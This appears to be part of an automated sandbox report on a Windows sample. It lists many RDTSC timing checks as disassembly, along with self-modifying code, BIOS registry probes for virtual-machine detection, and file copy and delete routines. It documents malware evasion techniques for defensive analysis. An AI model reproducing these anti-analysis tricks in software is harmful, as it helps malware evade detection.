              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805365 second address: 80536F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F63C8B57C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804EBE second address: 804EC8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F63C8D82F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80756A second address: 807570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807570 second address: 807584 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F63C8D82F46h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F63C8D82F52h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807584 second address: 80758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809E9F second address: 809EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EA3 second address: 809ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F63C8B57C18h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F63C8B57C20h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098A1 second address: 8098AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098AB second address: 8098AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098AF second address: 8098BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F63C8D82F46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098BF second address: 8098C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809A78 second address: 809A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809A82 second address: 809A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F63C8B57C1Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809A9C second address: 809AA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2B8 second address: 80F2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2BC second address: 80F2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F63C8D82F59h 0x00000009 jmp 00007F63C8D82F58h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2F1 second address: 80F309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E15C second address: 73E178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F63C8D82F46h 0x0000000a jo 00007F63C8D82F4Ch 0x00000010 jnp 00007F63C8D82F46h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E178 second address: 73E17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E17E second address: 73E183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E183 second address: 73E1A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F63C8B57C28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E1A1 second address: 73E1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817A4B second address: 817A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F234 second address: 81F241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F63C8D82F46h 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F39F second address: 81F3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F4FD second address: 81F507 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F63C8D82F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F507 second address: 81F51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F63C8B57C1Dh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F51A second address: 81F525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F63C8D82F46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F7B3 second address: 81F7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F63C8B57C16h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007F63C8B57C16h 0x00000012 jnc 00007F63C8B57C16h 0x00000018 jp 00007F63C8B57C16h 0x0000001e jne 00007F63C8B57C16h 0x00000024 popad 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F916 second address: 81F92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F63C8D82F46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F92F second address: 81F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F934 second address: 81F957 instructions: 0x00000000 rdtsc 0x00000002 je 00007F63C8D82F5Dh 0x00000008 jmp 00007F63C8D82F57h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823C50 second address: 823C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F63C8B57C26h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823C78 second address: 823C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F50h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F63C8D82F46h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823C96 second address: 823CA9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F63C8B57C16h 0x00000008 jnl 00007F63C8B57C16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E7EC second address: 82E7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E7FB second address: 82E803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364E2 second address: 8364EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364EC second address: 8364F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364F2 second address: 8364FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364FC second address: 836506 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836506 second address: 83650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83650A second address: 83650E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834F30 second address: 834F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F63C8D82F50h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F63C8D82F46h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834F50 second address: 834F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842F29 second address: 842F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F50h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842F3D second address: 842F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842F51 second address: 842F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844826 second address: 84482B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84482B second address: 844833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847E72 second address: 847E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847A7C second address: 847A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8494DA second address: 8494EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F63C8B57C1Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B989 second address: 84B9B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F63C8D82F61h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F63C8D82F59h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F63C8D82F46h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F4B7 second address: 85F4BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F751 second address: 85F759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FBB7 second address: 85FBCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F63C8B57C1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FFC6 second address: 85FFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FFCA second address: 85FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F63C8B57C16h 0x00000013 jng 00007F63C8B57C16h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FFEB second address: 860001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864137 second address: 86413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86413E second address: 864144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8643C5 second address: 8643C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8643C9 second address: 8643CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8643CD second address: 8643D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8643D3 second address: 864451 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F63C8D82F4Ah 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007F63C8D82F4Ch 0x00000013 jnc 00007F63C8D82F48h 0x00000019 popad 0x0000001a nop 0x0000001b adc dx, F72Dh 0x00000020 call 00007F63C8D82F52h 0x00000025 adc dh, 00000052h 0x00000028 pop edx 0x00000029 push 00000004h 0x0000002b add dword ptr [ebp+122D3725h], edi 0x00000031 call 00007F63C8D82F49h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F63C8D82F59h 0x0000003e jmp 00007F63C8D82F4Dh 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 864451 second address: 864471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8B57C1Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F63C8B57C18h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 864750 second address: 864755 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 865929 second address: 86592D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86592D second address: 86593B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86593B second address: 86593F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 867435 second address: 86743A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC020D second address: 4EC021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC021C second address: 4EC0248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F63C8D82F4Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0248 second address: 4EC024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC024E second address: 4EC0252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0252 second address: 4EC0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0260 second address: 4EC0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0264 second address: 4EC0281 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 728EAC0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F63C8B57C1Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0319 second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC031F second address: 4EC0336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 4DC1ECA2h 0x00000011 mov ebx, 5C7630EEh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0336 second address: 4EC03A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov cl, 96h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007F63C8D82F59h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push ecx 0x00000016 call 00007F63C8D82F53h 0x0000001b pop ecx 0x0000001c pop ebx 0x0000001d pushfd 0x0000001e jmp 00007F63C8D82F56h 0x00000023 sbb si, 35F8h 0x00000028 jmp 00007F63C8D82F4Bh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC03A5 second address: 4EC03A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC03A9 second address: 4EC03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 783689 second address: 78368D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78368D second address: 783693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5DF830 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5DF914 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7A08D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7FC83B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_1-27268)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_1-26086)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
